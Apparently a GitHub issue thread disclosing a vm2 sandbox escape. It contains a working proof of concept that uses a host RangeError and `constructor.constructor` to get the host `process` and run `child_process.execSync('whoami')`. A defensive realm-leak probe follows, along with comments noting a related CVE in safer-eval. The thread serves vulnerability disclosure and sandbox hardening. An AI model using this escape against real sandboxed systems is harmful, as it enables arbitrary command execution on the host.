It is possible to generate a `RangeError: Maximum call stack size exceeded` almost anywhere. Sometimes the RangeError will be a host RangeError which is not Contextified.
I tried to make the code as stable as possible.

```js
"use strict";
const {VM} = require('vm2');
const untrusted = `
const f = Buffer.prototype.write;
const ft = {
	length: 10,
	utf8Write(){
	}
}
function r(i){
	var x = 0;
	try{
		x = r(i);
	}catch(e){}
	if(typeof(x)!=='number') return x;
	if(x!==i) return x+1;
	try{
		f.call(ft);
	}catch(e){
		return e;
	}
	return null;
}
var i=1;
while(1){
	try{
		i=r(i).constructor.constructor("return process")();
		break;
	}catch(x){
		i++;
	}
}
i.mainModule.require("child_process").execSync("whoami").toString()
`;
try{
	console.log(new VM().run(untrusted));
}catch(x){
	console.log(x);
}
```

I used 11.8.0.
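
The invariant this report depends on, as an added example that is not part of the original thread and not vm2's code: an exception object from the host realm must never reach sandboxed code. It uses only Node's built-in `vm` module (which is not a security boundary); `hostLen`, `bridge` and `probe` are hypothetical names, and the bridge is a simplified stand-in for contextification.

```javascript
const vm = require('vm');

// Constructed host API: throws a host-realm TypeError on bad input.
function hostLen(s) {
  if (typeof s !== 'string') throw new TypeError('expected a string');
  return s.length;
}

// Hypothetical bridge (not vm2's implementation). The wrapper is compiled
// inside the context, so it and every error it throws belong to the sandbox
// realm; the host function stays in a closure and only primitives come back.
function bridge(ctx, hostFn) {
  const factory = vm.runInContext(`(function (call) {
    return function (...args) {
      let r;
      try { r = call(...args); }
      catch (e) { throw new Error(String(e && e.message)); }
      if (r !== null && (typeof r === 'object' || typeof r === 'function')) {
        throw new Error('non-primitive result blocked');
      }
      return r;
    };
  })`, ctx);
  return factory(hostFn);
}

// Runs inside the sandbox: call fn with a bad argument and report which realm
// the caught exception belongs to, judged against the sandbox's own globals.
const PROBE = `(function (fn) {
  try { fn(42); } catch (e) {
    return {
      sandboxError: e instanceof Error,
      sandboxFunction: e.constructor.constructor === Function
    };
  }
  return null;
})`;

function probe(ctx, fn) {
  return vm.runInContext(PROBE, ctx)(fn);
}

const ctx = vm.createContext({});
console.log('raw host function:', probe(ctx, hostLen));
console.log('bridged function: ', probe(ctx, bridge(ctx, hostLen)));
```

A check like `probe` fits a sandbox's regression suite: any code path where both fields come back `false` is handing sandboxed code a host-realm object.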
@XmiliaH Just a heads up, your POC worked against another project as well called Safer-Eval and had the following CVE number assigned to it: CVE-2019-10769. Nice finding!
You can break out far more easily, see commenthol/safer-eval#10. And to get a host exception one can just supply an invalid argument to get an exception. Using a maximum call stack RangeError is overkill.